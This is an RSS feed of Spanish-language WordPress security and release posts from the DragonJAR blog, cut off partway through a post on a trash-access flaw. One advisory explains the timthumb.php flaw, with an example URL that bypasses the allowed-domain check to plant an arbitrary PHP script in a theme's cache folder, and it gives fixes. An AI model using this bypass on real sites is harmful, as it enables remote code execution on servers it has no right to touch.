<?xml version="1.0" encoding="UTF-8"?> <rss
version="2.0"
xmlns:content="http://purl.org/rss/1.0/modules/content/"
xmlns:wfw="http://wellformedweb.org/CommentAPI/"
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:atom="http://www.w3.org/2005/Atom"
xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
><channel><title>La Comunidad DragonJAR &#187; WordPress</title> <atom:link href="http://www.dragonjar.org/tag/wordpress/feed" rel="self" type="application/rss+xml" /><link>http://www.dragonjar.org</link> <description>Noticias de actualidad y seguridad informática, herramientas de seguridad, documentación y una excelente COMUNIDAD.</description> <lastBuildDate>Sat, 11 Feb 2012 22:13:24 +0000</lastBuildDate> <language>en</language> <sy:updatePeriod>hourly</sy:updatePeriod> <sy:updateFrequency>1</sy:updateFrequency> <generator>http://wordpress.org/?v=3.3.1</generator> <item><title>Vulnerabilidad en timthumb.php afecta millones de blogs con WordPress</title><link>http://www.dragonjar.org/vulnerabilidad-en-timthumb-php-afecta-millones-de-blogs-con-wordpress.xhtml</link> <comments>http://www.dragonjar.org/vulnerabilidad-en-timthumb-php-afecta-millones-de-blogs-con-wordpress.xhtml#comments</comments> <pubDate>Thu, 04 Aug 2011 19:20:58 +0000</pubDate> <dc:creator>Hans Code</dc:creator> <category><![CDATA[Seguridad Web]]></category> <category><![CDATA[Exploit]]></category> <category><![CDATA[fallo]]></category> <category><![CDATA[Seguridad]]></category> <category><![CDATA[timthumb.php]]></category> <category><![CDATA[WordPress]]></category><guid
isPermaLink="false">http://www.dragonjar.org/?p=6810</guid> <description><![CDATA[Recientemente Mark Maunder, CEO de Feedjit descubrió una vulnerabilidad en la librería timthumb.php, que podría permitir a un usuario malintencionado, ejecutar código PHP de manera arbitraria. Gracias a timthumb.php es posible cambiarle de tamaño a las imágenes de forma automática. Esta utilidad presente en millones de plantillas de WordPress, utiliza un directorio que es accesible vía web, para alojar  las imágenes resultantes del proceso de obtener [...]]]></description> <content:encoded><![CDATA[<p
style="float:right; margin:0 0 10px 15px; width:240px;"> <img
src="http://www.dragonjar.org/wp-content/uploads/2011/08/timthumb.jpg" width="240" title="Vulnerabilidad en timthumb.php afecta millones de blogs con Wordpress" alt="timthumb Vulnerabilidad en timthumb.php afecta millones de blogs con Wordpress" /></p><p>Recientemente Mark Maunder, CEO de Feedjit <a
href="http://markmaunder.com/2011/zero-day-vulnerability-in-many-wordpress-themes/" target="_blank">descubrió una vulnerabilidad</a> en la librería <strong>timthumb.<a
href="http://www.dragonjar.org/tag/php" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con PHP">php</a></strong>, que podría permitir a un usuario malintencionado, ejecutar código PHP de manera arbitraria.</p><p
style="text-align: center;"><a
href="http://www.dragonjar.org/wp-content/uploads/2011/08/timthumb.jpg"><img
title="timthumb problema de seguridad" src="http://www.dragonjar.org/wp-content/uploads/2011/08/timthumb.jpg" alt="timthumb Vulnerabilidad en timthumb.php afecta millones de blogs con Wordpress" width="580" height="363" /></a><a
href="http://www.dragonjar.org/wp-content/uploads/2011/08/timthumb.jpg"><br
/> </a></p><p>Gracias a <a
href="http://www.dragonjar.org/tag/timthumb-php" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con timthumb.php">timthumb.php</a> es posible cambiarle de tamaño a las imágenes de forma automática. Esta utilidad presente <strong>en millones de plantillas de <a
href="http://www.dragonjar.org/tag/wordpress" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con WordPress">WordPress</a></strong>, utiliza un directorio que es accesible vía web, para alojar  las imágenes resultantes del proceso de obtener una imagen y redimensionarla.</p><p>Por defecto, timthumb.php (también nombrado como thumb.php en ciertas plantillas) permite cargar y redimensionar imágenes remotamente desde los siguientes dominios:</p><pre class="brush:php">$allowedSites = array (
	'flickr.com',
	'picasa.com',
	'blogger.com',
	'wordpress.com',
	'img.youtube.com',
	'upload.wikimedia.org',
	'photobucket.com',
);</pre><p>Generalmente el directorio en cuestión es nombrado como &#8220;cache&#8221;. El problema radica en que timthumb.php no comprueba correctamente los dominios desde donde es posible recibir una imagen. En consecuencia y dado que el directorio &#8220;cache&#8221; puede ser accesible desde  el navegador web, pues un atacante podría cargar y ejecutar código PHP arbitrario y hacer de las suyas con solo especificar algunos de los dominios del array anterior en la URL; por ejemplo:</p><blockquote><p><a
href="http://blogger.com.dominio.com/badscript.php" target="_blank">http://blogger.com.dominio.<wbr>com/badscript.php</wbr></a></p></blockquote><p>De esta manera, timthumb.php lo alojará el fichero badscript.php dentro del directorio de caché en el sitio de destino, por ejemplo:</p><blockquote><p><a
href="http://tudominio.com/wp-content/themes/tuplantilla/cache/badscript.php" target="_blank">http://tudominio.com/wp-<wbr>content/themes/tuplantilla/<wbr>cache/badscript.php</wbr></wbr></a></p></blockquote><p>Así las cosas, desde el navegador cualquier código que haya en el fichero badscript.php será ejecutado por el servidor web del usuario víctima. Tal cual, <a
href="http://markmaunder.com/2011/zero-day-vulnerability-in-many-wordpress-themes/" target="_blank">lo explica Maunder</a> quien descubrió la <a
href="http://www.dragonjar.org/tag/vulnerabilidad" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Vulnerabilidad">vulnerabilidad</a> cuando realizaba una auditoria de un ataque ejecutado en su propio blog.</p><p>Plantillas de <a
href="http://woothemes.com/" target="_blank">Woothemes</a>, <a
href="http://elegantthemes.com/" target="_blank">Elegantthemes</a>, <a
href="http://themeforest.com/" target="_blank">Themeforest</a>, <a
href="http://templatic.com/" target="_blank">templatic</a>, entre miles de otros proveedores, son vulnerables.</p><h2><strong>Instrucciones para reparar la vulnerabilidad y mitigar los riesgos.</strong></h2><p>Si utilizas <a
href="http://woothemes.com/" target="_blank">plantillas de Woothemes</a> y tienes una cuenta en este sitio, desde ya puedes descargar la versión actualizada de tu theme, tomar el thumb.php <a
href="http://www.dragonjar.org/tag/vulnerable" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Vulnerable">vulnerable</a> y reemplazarlo por el nuevo. En otro caso, la recomendación es <a
href="http://code.google.com/p/timthumb/source/browse/trunk/timthumb.php" target="_blank">descargar la versión actualizada de timthumb.php (la 1.33)</a> y a partir de este <a
href="http://www.dragonjar.org/tag/actualizar" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Actualizar">actualizar</a> el timthumb.php de tu plantilla.</p><p>Adicionalmente, en la línea 27 del script actualizado, eliminar todos los dominios permitidos del array ($allowedSites = array();)</p><p>Del mismo modo, recomendamos asegurarse de que la siguiente linea se haya establecido como FALSE:</p><pre class="brush:php">define ('ALLOW_EXTERNAL', FALSE);           // allow external website (override security precaution - not advised!)</pre><p>Esta vulnerabilidad es <strong>considerada como critica</strong> y al hacer una búsqueda en Google, obtenemos 40 millones de resultados relacionados con el script.</p><h2><strong>WordThumb, la versión segura de timthumb.php</strong></h2><p>Hace unas horas, Maunder, ha publicado una tercera actualización donde da a conocer detalles de un nuevo proyecto llamado Wordthumb, que promete ser la versión segura de lo que conocemos como timthumb.php y es el resultado de una reescritura completa de este script, sin afectar la compatibilidad del mismo. El único código que sigue siendo original de timthumb, son las rutinas de procesamiento de imágenes.  Todo lo demás ha sido reconstruido desde cero.</p><p>Las instrucciones básicas sobre como usar este código se encuentra <a
href="http://code.google.com/p/wordthumb/" target="_blank">disponible en Google Code</a>. Dentro de la mejoras se destacan aspectos como la utilización de un directorio que no es accesible vía web para el almacenamiento de las imágenes que son redimensionadas y además como medida de <a
href="http://www.dragonjar.org/tag/seguridad" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Seguridad">seguridad</a> extra, todos los archivos almacenados en caché, tiene una extensión txt, entre otras mejoras.</p><p>Para más detalles sobre Wordthumb te invitamos a leer el anuncio de Maunder: <a
href="http://markmaunder.com/2011/a-secure-rewrite-of-timthumb-php-as-wordthumb/" target="_blank">A secure rewrite of timthumb.php as Wordthumb</a></p><h3  class="related_post_title">También puede interesarte...</h3><ul
class="related_post"><li><a
href="http://www.dragonjar.org/multiples-distribuciones-de-seguridad-en-tu-usb-con-katana.xhtml" title="Katana 2.0 Múltiples Distribuciones de Seguridad en tu USB">Katana 2.0 Múltiples Distribuciones de Seguridad en tu USB</a></li><li><a
href="http://www.dragonjar.org/video-de-la-charla-padding-oracles-everywhere-en-la-ekoparty-2010.xhtml" title="Vídeo de la Charla &#8211; Padding Oracles Everywhere en la EKOParty 2010">Vídeo de la Charla &#8211; Padding Oracles Everywhere en la EKOParty 2010</a></li><li><a
href="http://www.dragonjar.org/lluvia-de-0days-en-la-ekoparty.xhtml" title="Lluvia de 0days en la EKOParty">Lluvia de 0days en la EKOParty</a></li><li><a
href="http://www.dragonjar.org/pueden-leer-tu-basura.xhtml" title="Pueden leer tu &#8220;Basura&#8221;">Pueden leer tu &#8220;Basura&#8221;</a></li><li><a
href="http://www.dragonjar.org/video-explotando-wm-downloader.xhtml" title="Video: Explotando WM Downloader ">Video: Explotando WM Downloader </a></li><li><a
href="http://www.dragonjar.org/bypass-con-metasploit-atacando-a-nuestro-objetivo-desde-una-maquina-ya-comprometida.xhtml" title="Bypass con Metasploit: atacando a nuestro objetivo desde una maquina ya comprometida">Bypass con Metasploit: atacando a nuestro objetivo desde una maquina ya comprometida</a></li><li><a
href="http://www.dragonjar.org/realizaron-hardening-wordpress-descarga-la-nueva-versin-285.xhtml" title="Realizaron Hardening a WordPress, Descarga la nueva versión 2.8.5">Realizaron Hardening a WordPress, Descarga la nueva versión 2.8.5</a></li><li><a
href="http://www.dragonjar.org/dos-en-wordpress.xhtml" title="Denegacion de Servicio en WordPress">Denegacion de Servicio en WordPress</a></li></ul>]]></content:encoded> <wfw:commentRss>http://www.dragonjar.org/vulnerabilidad-en-timthumb-php-afecta-millones-de-blogs-con-wordpress.xhtml/feed</wfw:commentRss> <slash:comments>3</slash:comments> </item> <item><title>WordPress 3.1</title><link>http://www.dragonjar.org/wordpress-3-1.xhtml</link> <comments>http://www.dragonjar.org/wordpress-3-1.xhtml#comments</comments> <pubDate>Tue, 15 Feb 2011 16:52:42 +0000</pubDate> <dc:creator>DragoN</dc:creator> <category><![CDATA[Seguridad Web]]></category> <category><![CDATA[Español]]></category> <category><![CDATA[nueva]]></category> <category><![CDATA[Version]]></category> <category><![CDATA[WordPress]]></category><guid
isPermaLink="false">http://www.dragonjar.org/?p=5777</guid> <description><![CDATA[Después de mucha espera, algunos retrasos, por fin sale la nueva versión 3.1 de WordPress. Entre las mejoras mas importantes, podemos encontrar: Consultas avanzadas: algo que muchos estábamos pediendo. Enlaces internos: para buscar entradas anteriores de tu sitio y enlazarlas facilmente. Barra de administrador: que aparecerá cuando estemos logueados en el sitio como admin, sin entrar al [...]]]></description> <content:encoded><![CDATA[<p
style="float:right; margin:0 0 10px 15px; width:240px;"> <img
src="http://www.dragonjar.org/wp-content/uploads/2011/02/WordPress31.jpg" width="240" title="WordPress 3.1" alt="WordPress31 WordPress 3.1" /></p><p>Después de mucha espera, algunos retrasos, por fin sale la <a
href="http://www.dragonjar.org/tag/nueva" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con nueva">nueva</a> versión 3.1 de <a
href="http://www.dragonjar.org/tag/wordpress" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con WordPress">WordPress</a>.</p><p
style="text-align: center;"><img
class="alignnone" title="Wordpress 3.1 español" src="http://www.dragonjar.org/wp-content/uploads/2011/02/WordPress31.jpg" alt="WordPress31 WordPress 3.1" width="311" height="327" /></p><p>Entre las mejoras mas importantes, podemos encontrar:<span
id="more-5777"></span></p><ul><li><strong>Consultas avanzadas: </strong>algo que muchos estábamos pediendo.</li><li><strong>Enlaces internos:</strong> para buscar entradas anteriores de tu sitio y enlazarlas facilmente.</li><li><strong>Barra de <a
href="http://www.dragonjar.org/tag/administrador" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Administrador">administrador</a>:</strong> que aparecerá cuando estemos logueados en el sitio como admin, sin entrar al panel.</li><li><strong>Mejor panel de escritura:</strong> mucho mas limpia y sencilla que antes, con muchas opciones que no usábamos ocultas por defecto</li><li><strong>Administrador de la red:</strong> se agruparon los menús de admin y sus opciones en la nuevaPantalla de administrador de la red.</li><li>Ademas mejores en el sistema del exportado/importado, su esquema de colores y en el contenido personalizado entre otras</li></ul><h2 style="text-align: center;"><a
href="http://es.wordpress.org/">Descargar WordPress 3.1 Español</a></h2><p>Lo puedes bajar desde de tu WordPress (si ya te aparece el mensaje) o desde la página oficial de WordPress.org.</p><h3  class="related_post_title">También puede interesarte...</h3><ul
class="related_post"><li><a
href="http://www.dragonjar.org/descarga-wordpress-3-0.xhtml" title="Descarga WordPress 3.0">Descarga WordPress 3.0</a></li><li><a
href="http://www.dragonjar.org/nueva-version-de-wordpress-2-9.xhtml" title="Nueva versíon de WordPress 2.9">Nueva versíon de WordPress 2.9</a></li><li><a
href="http://www.dragonjar.org/problemas-de-seguridad-en-wordpress-2-8-2-actualiza-a-wordpress-2-8-3.xhtml" title="Problemas de Seguridad en WordPress 2.8.2, Actualiza a WordPress 2.8.3">Problemas de Seguridad en WordPress 2.8.2, Actualiza a WordPress 2.8.3</a></li><li><a
href="http://www.dragonjar.org/descarga-wordpress-27-final.xhtml" title="Descarga WordPress 2.7 con Manual">Descarga WordPress 2.7 con Manual</a></li><li><a
href="http://www.dragonjar.org/wordpress-security-whitepaper-y-mod-security-and-wordpress-en-espanol.xhtml" title="WordPress Security WhitePaper y Mod Security and Wordpress en Español ">WordPress Security WhitePaper y Mod Security and Wordpress en Español </a></li><li><a
href="http://www.dragonjar.org/capacitacion-gratuita-para-realizar-el-ceh-de-ec-council.xhtml" title="Capacitación gratuita para realizar el CEH de EC-Council">Capacitación gratuita para realizar el CEH de EC-Council</a></li><li><a
href="http://www.dragonjar.org/intypedia-enciclopedia-visual-de-la-seguridad-informatica.xhtml" title="IntyPedia &#8211; Enciclopedia visual de la Seguridad Informática">IntyPedia &#8211; Enciclopedia visual de la Seguridad Informática</a></li><li><a
href="http://www.dragonjar.org/vulnerabilidad-en-timthumb-php-afecta-millones-de-blogs-con-wordpress.xhtml" title="Vulnerabilidad en timthumb.php afecta millones de blogs con Wordpress">Vulnerabilidad en timthumb.php afecta millones de blogs con Wordpress</a></li></ul>]]></content:encoded> <wfw:commentRss>http://www.dragonjar.org/wordpress-3-1.xhtml/feed</wfw:commentRss> <slash:comments>2</slash:comments> </item> <item><title>WordPress el CMS OpenSource más Seguro</title><link>http://www.dragonjar.org/wordpress-el-cms-opensource-mas-seguro.xhtml</link> <comments>http://www.dragonjar.org/wordpress-el-cms-opensource-mas-seguro.xhtml#comments</comments> <pubDate>Wed, 04 Aug 2010 17:11:32 +0000</pubDate> <dc:creator>DragoN</dc:creator> <category><![CDATA[Seguridad Web]]></category> <category><![CDATA[cms]]></category> <category><![CDATA[Seguro]]></category> <category><![CDATA[WordPress]]></category><guid
isPermaLink="false">http://www.dragonjar.org/?p=4797</guid> <description><![CDATA[Un estudio realizado por el investigador de seguridad para Qualys y creador de BlindElephant, Patrick Thomas, saco a relucir que la mayoría de los CMS OpenSource que encontramos en la red, tienen un alto grado de problemas en su seguridad, aplicaciones como MediaWiki, Joomla, Movile Type, y Drupal, son solo algunas de las que quedan [...]]]></description> <content:encoded><![CDATA[<p
style="float:right; margin:0 0 10px 15px; width:240px;"> <img
src="http://www.dragonjar.org/wp-content/uploads/2010/08/CMS.jpg" width="240" title="WordPress el CMS OpenSource más Seguro" alt="CMS WordPress el CMS OpenSource más Seguro" /></p><p>Un estudio realizado por el investigador de <a
href="http://www.dragonjar.org/tag/seguridad" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Seguridad">seguridad</a> para Qualys y <a
href="https://community.qualys.com/community/blindelephant">creador de BlindElephant</a>, Patrick Thomas, saco a relucir que la mayoría de los <a
href="http://www.dragonjar.org/tag/cms" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con cms">CMS</a> OpenSource que encontramos en la red, tienen un alto grado de problemas en su seguridad, aplicaciones como MediaWiki, Joomla, Movile Type, y Drupal, son solo algunas de las que quedan peor paradas en este aspecto según este informe, también se puede destacar a  <a
href="http://www.dragonjar.org/tag/wordpress" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con WordPress">WordPress</a>  como el <a
href="http://www.dragonjar.org/tag/cms" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con cms">CMS</a> OpenSource mas <a
href="http://www.dragonjar.org/tag/seguro" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Seguro">seguro</a> (o <strong>menos inseguro</strong>&#8230;) que podemos utilizar libremente.</p><p
style="text-align: center;"><img
class="alignnone" title="WordPress el mas seguro de los CMS populares" src="http://www.dragonjar.org/wp-content/uploads/2010/08/CMS.jpg" alt="CMS WordPress el CMS OpenSource más Seguro" width="500" height="263" /></p><p>Thomas se puso en la tarea de examinar uno a uno los CMS OpenSource mas populares que existen en la actualidad, utilizando su creación <a
href="https://community.qualys.com/community/blindelephant">BlindElephant</a>, que le permite identificar con un pequeño margen de error, las versiones de un CMS utilizadas en una pagina, con esta <a
href="http://www.dragonjar.org/tag/informacion" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Informacion">informacion</a> en mano y utilizando los anuncios sobre vulnerabilidades publicados por los mismos fabricantes, pudo sacar un mapa con la versión de cada CMS y sus respectivos problemas de seguridad, dando como resultado un &#8220;ranking&#8221; de los CMS y su porcentaje de los fallos en seguridad que han presentado.<span
id="more-4797"></span></p><p>Les recomiendo que vean la charla que Patrick realizo en la pasada BlackHat USA 2010 (<a
href="http://www.dragonjar.org/memorias-del-black-hat-usa-2010.xhtml">pueden descargar las demás charlas en este enlace</a>) donde presento su investigación:</p><p
style="text-align: center;"><object
id="__sse4916708" classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="425" height="355" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param
name="allowFullScreen" value="true" /><param
name="allowScriptAccess" value="always" /><param
name="src" value="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=blindelephant-blackhat2010v2-100806103317-phpapp02&amp;stripped_title=blind-elephant-black-hat-2010-v2" /><param
name="name" value="__sse4916708" /><param
name="allowfullscreen" value="true" /><embed
id="__sse4916708" type="application/x-shockwave-flash" width="425" height="355" src="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=blindelephant-blackhat2010v2-100806103317-phpapp02&amp;stripped_title=blind-elephant-black-hat-2010-v2" name="__sse4916708" allowscriptaccess="always" allowfullscreen="true"></embed></object></p><p>De la charla podemos sacar los siguientes porcentajes de Vulnerabilidades Criticas en algunos de los CMS mas populares:</p><ul><li>95% creados con MediaWiki</li><li>91% de los sitios basados en Joomla</li><li>77% de los sitios creados con Movable Type</li><li>69% de sitios creados con Drupal</li><li>WordPress &#8220;<strong>solo</strong>&#8221; mostró un 4% de vulnerabilidades críticas y un 21.5% de vulnerabilidades medias, coronandolo como el CMS OpenSource (solo se analizaron los mas populares) menos inseguros.</li></ul><p>A mi personalmente me gusta mucho WordPress, el hecho que traiga &#8220;solo lo necesario&#8221; pero que se puedan expandir sus posibilidades hasta el nivel que necesitemos es lo que mas me llama la atención, su camaradería con los buscadores, su actualizado automático y un sinfin de otras características han hecho que lo utilice como base para muchos de mis proyectos. Si estas indeciso sobre que CMS utilizar, desde nuestra comunidad te recomendamos WordPress.</p><p>Si quieres aumentar aun la seguridad de tu WordPress te recomiendo leer la guía de <a
title="Enlace permanente a WordPress Security WhitePaper y Mod Security and WordPress en Español" rel="nofollow" href="../wordpress-security-whitepaper-y-mod-security-and-wordpress-en-espanol.xhtml" target="_blank">seguridad para WordPress en Español</a> y el documento sobre como configurar adecuadamente el <a
href="http://www.modsecurity.org/">mod_security</a> para tu instalación de WorPress.</p><p><strong>Mas Información:</strong><br
/> <a
href="http://news.qualys.com/2010/07/qualys-releases-blindelephant.html">Qualys Releases &#8220;BlindElephant&#8221; Open Source Web Application Fingerprinting Tool</a></p><h3  class="related_post_title">También puede interesarte...</h3><ul
class="related_post"><li><a
href="http://www.dragonjar.org/vulnerabilidad-en-timthumb-php-afecta-millones-de-blogs-con-wordpress.xhtml" title="Vulnerabilidad en timthumb.php afecta millones de blogs con Wordpress">Vulnerabilidad en timthumb.php afecta millones de blogs con Wordpress</a></li><li><a
href="http://www.dragonjar.org/wordpress-3-1.xhtml" title="WordPress 3.1">WordPress 3.1</a></li><li><a
href="http://www.dragonjar.org/en-vivo-dragonjar-tv.xhtml" title="En vivo DragonJAR.tv">En vivo DragonJAR.tv</a></li><li><a
href="http://www.dragonjar.org/dragonjar-tv-en-vivo-manana.xhtml" title="DragonJAR TV en vivo mañana">DragonJAR TV en vivo mañana</a></li><li><a
href="http://www.dragonjar.org/descarga-wordpress-3-0.xhtml" title="Descarga WordPress 3.0">Descarga WordPress 3.0</a></li><li><a
href="http://www.dragonjar.org/lista-de-tareas-seguridad-en-php.xhtml" title="Lista de tareas para revisar la seguridad en proyectos PHP">Lista de tareas para revisar la seguridad en proyectos PHP</a></li><li><a
href="http://www.dragonjar.org/fallo-en-openssl-permite-obtener-clave-privada.xhtml" title="Fallo en OpenSSL permite obtener clave privada">Fallo en OpenSSL permite obtener clave privada</a></li><li><a
href="http://www.dragonjar.org/el-navegador-mas-seguro.xhtml" title="&#8220;Crean&#8221; un navegador pensando en su seguridad">&#8220;Crean&#8221; un navegador pensando en su seguridad</a></li></ul>]]></content:encoded> <wfw:commentRss>http://www.dragonjar.org/wordpress-el-cms-opensource-mas-seguro.xhtml/feed</wfw:commentRss> <slash:comments>12</slash:comments> </item> <item><title>Descarga WordPress 3.0</title><link>http://www.dragonjar.org/descarga-wordpress-3-0.xhtml</link> <comments>http://www.dragonjar.org/descarga-wordpress-3-0.xhtml#comments</comments> <pubDate>Tue, 15 Jun 2010 20:22:44 +0000</pubDate> <dc:creator>DragoN</dc:creator> <category><![CDATA[Seguridad Web]]></category> <category><![CDATA[Español]]></category> <category><![CDATA[nueva]]></category> <category><![CDATA[Version]]></category> <category><![CDATA[WordPress]]></category><guid
isPermaLink="false">http://www.dragonjar.org/?p=4513</guid> <description><![CDATA[Después de mucha espera, algunos retrasos y RC para &#8220;contentarnos&#8221; por los retrasos, por fin sale la nueva versión 3.0 de WordPress. Entre las mejoras mas importantes, podemos encontrar: Ahora podremos escoger el nombre de usuario y contraseña a la hora de instalar WordPress, algo altamente recomendable para aumentar la seguridad de nuestra instalación. Guía [...]]]></description> <content:encoded><![CDATA[<p
style="float:right; margin:0 0 10px 15px; width:240px;"> <img
src="http://www.dragonjar.org/wp-content/uploads/2010/06/wp3.jpg" width="240" title="Descarga WordPress 3.0" alt="wp3 Descarga WordPress 3.0" /></p><p>Después de mucha espera, algunos retrasos y RC para &#8220;contentarnos&#8221; por los retrasos, por fin sale la <a
href="http://www.dragonjar.org/tag/nueva" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con nueva">nueva</a> versión 3.0 de <a
href="http://www.dragonjar.org/tag/wordpress" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con WordPress">WordPress</a>.</p><p
style="text-align: center;"><img
class="alignnone" title="Wordpress 3.0 en español" src="http://www.dragonjar.org/wp-content/uploads/2010/06/wp3.jpg" alt="wp3 Descarga WordPress 3.0" width="500" height="277" /></p><p>Entre las mejoras mas importantes, podemos encontrar:</p><ul><li>Ahora podremos escoger el nombre de usuario y contraseña a la hora de instalar WordPress, <strong>algo altamente recomendable para aumentar la <a
href="http://www.dragonjar.org/tag/seguridad" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Seguridad">seguridad</a> de nuestra instalación</strong>.</li><li><strong>Guía o asistente de bienvenida</strong>, para facilitar aun mas a los nuevos usuarios el uso de WordPress.</li><li>Mejoras en los &#8220;Tipos de Post&#8221;</li><li>Nuevo tema &#8220;Twenty&#8221; altamente configurable.</li><li>Añadiendo la línea de código <code>add_custom_background();</code> al  archivo functions.<a
href="http://www.dragonjar.org/tag/php" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con PHP">php</a> podemos cambiar a gusto el fondo de cualquier tema.</li><li>Podremos personalizar cada categoría con un tema (plantilla o theme) diferente.</li><li>Canonical desarrollará plugins para WordPress, la empresa detras de Ubuntu, ahora también desarrollara plugins para WP.</li><li>El menú de navegación ahora es totalmente configurable, podremos poner categorías y subcategorias a gusto.</li><li>Integración con WordPress MU</li></ul><p>Les dejo este vídeo con las nuevas características:</p><p
style="text-align: center;"><embed
src="http://v.wordpress.com/wp-content/plugins/video/flvplayer.swf?ver=1.21" type="application/x-shockwave-flash" width="400" height="224" wmode="transparent" seamlesstabbing="true" allowfullscreen="true" allowscriptaccess="always" overstretch="true" flashvars="guid=BQtfIEY1&amp;width=400&amp;height=224&amp;locksize=no&amp;dynamicseek=false&amp;qc_publisherId=p-18-mFEk4J448M" title="Introducing WordPress 3.0 &quot;Thelonious&quot;"></embed></p><p><strong>Mas Información:</strong><br
/> <a
href="http://wordpress.org/development/2010/06/thelonious/">WordPress 3.0 “Thelonious”</a></p><h3  class="related_post_title">También puede interesarte...</h3><ul
class="related_post"><li><a
href="http://www.dragonjar.org/wordpress-3-1.xhtml" title="WordPress 3.1">WordPress 3.1</a></li><li><a
href="http://www.dragonjar.org/nueva-version-de-wordpress-2-9.xhtml" title="Nueva versíon de WordPress 2.9">Nueva versíon de WordPress 2.9</a></li><li><a
href="http://www.dragonjar.org/problemas-de-seguridad-en-wordpress-2-8-2-actualiza-a-wordpress-2-8-3.xhtml" title="Problemas de Seguridad en WordPress 2.8.2, Actualiza a WordPress 2.8.3">Problemas de Seguridad en WordPress 2.8.2, Actualiza a WordPress 2.8.3</a></li><li><a
href="http://www.dragonjar.org/descarga-wordpress-27-final.xhtml" title="Descarga WordPress 2.7 con Manual">Descarga WordPress 2.7 con Manual</a></li><li><a
href="http://www.dragonjar.org/wordpress-security-whitepaper-y-mod-security-and-wordpress-en-espanol.xhtml" title="WordPress Security WhitePaper y Mod Security and Wordpress en Español ">WordPress Security WhitePaper y Mod Security and Wordpress en Español </a></li><li><a
href="http://www.dragonjar.org/capacitacion-gratuita-para-realizar-el-ceh-de-ec-council.xhtml" title="Capacitación gratuita para realizar el CEH de EC-Council">Capacitación gratuita para realizar el CEH de EC-Council</a></li><li><a
href="http://www.dragonjar.org/intypedia-enciclopedia-visual-de-la-seguridad-informatica.xhtml" title="IntyPedia &#8211; Enciclopedia visual de la Seguridad Informática">IntyPedia &#8211; Enciclopedia visual de la Seguridad Informática</a></li><li><a
href="http://www.dragonjar.org/vulnerabilidad-en-timthumb-php-afecta-millones-de-blogs-con-wordpress.xhtml" title="Vulnerabilidad en timthumb.php afecta millones de blogs con Wordpress">Vulnerabilidad en timthumb.php afecta millones de blogs con Wordpress</a></li></ul>]]></content:encoded> <wfw:commentRss>http://www.dragonjar.org/descarga-wordpress-3-0.xhtml/feed</wfw:commentRss> <slash:comments>3</slash:comments> </item> <item><title>Pueden leer tu &#8220;Basura&#8221;</title><link>http://www.dragonjar.org/pueden-leer-tu-basura.xhtml</link> <comments>http://www.dragonjar.org/pueden-leer-tu-basura.xhtml#comments</comments> <pubDate>Mon, 15 Feb 2010 07:33:25 +0000</pubDate> <dc:creator>DragoN</dc:creator> <category><![CDATA[Seguridad Web]]></category> <category><![CDATA[Informacion]]></category> <category><![CDATA[Seguridad]]></category> <category><![CDATA[WordPress]]></category><guid
isPermaLink="false">http://www.dragonjar.org/?p=3856</guid> <description><![CDATA[Un nuevo fallo en el famoso WordPress, descubierto por el investigador Thomas Mackenzie permitiría a &#8220;cualquier&#8221; persona los artículos, comentarios y paginas, que hayas borrado y se encuentren en la &#8220;papelera&#8221;. Desde la versión 2.9 de WordPress se implementó una nueva característica  llamada &#8220;papelera&#8220;, con la cual todos los artículos, comentarios o páginas &#8220;borradas&#8221; pasarían [...]]]></description> <content:encoded><![CDATA[<p
style="text-align: justify;">Un nuevo <a
href="http://www.dragonjar.org/tag/fallo" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con fallo">fallo</a> en el famoso <a
href="http://www.dragonjar.org/tag/wordpress" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con WordPress">WordPress</a>, descubierto por el investigador <a
href="http://tmacuk.co.uk/?p=180">Thomas Mackenzie</a> permitiría a &#8220;cualquier&#8221; persona los artículos, comentarios y paginas, que hayas borrado y se encuentren en la &#8220;papelera&#8221;.</p><p
style="text-align: center;"><img
class="alignnone" title="Fallo en WordPress" src="http://img59.imageshack.us/img59/5996/wordpresstrash300x300.png" alt="wordpresstrash300x300 Pueden leer tu Basura" width="300" height="300" /></p><p
style="text-align: justify;">Desde la versión 2.9 de WordPress se implementó una <a
href="http://www.dragonjar.org/tag/nueva" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con nueva">nueva</a> característica  llamada &#8220;<a
href="http://www.youtube.com/watch?v=dFlBm2XGv4g">papelera</a>&#8220;, con la cual todos los artículos, comentarios o páginas &#8220;borradas&#8221; pasarían a la &#8220;papelera de reciclaje&#8221; para prevenir así que sean eliminados de forma accidental.</p><p
style="text-align: justify;">Lo que descubrió <a
href="http://tmacuk.co.uk/?p=180">Thomas Mackenzie</a> es que en WordPress decidieron no ponerle restricción de acceso a los contenidos de la &#8220;papelera&#8221;, por lo que cualquier persona con privilegio 0 (Suscriptor) podría ver todo lo que estuviera almacenado en ella, el único inconveniente (y posiblemente la razón por la que dejaron este nivel de acceso), es que necesitamos conocer la ruta de los contenidos eliminados para poder acceder a ellos&#8230; cosa que <a
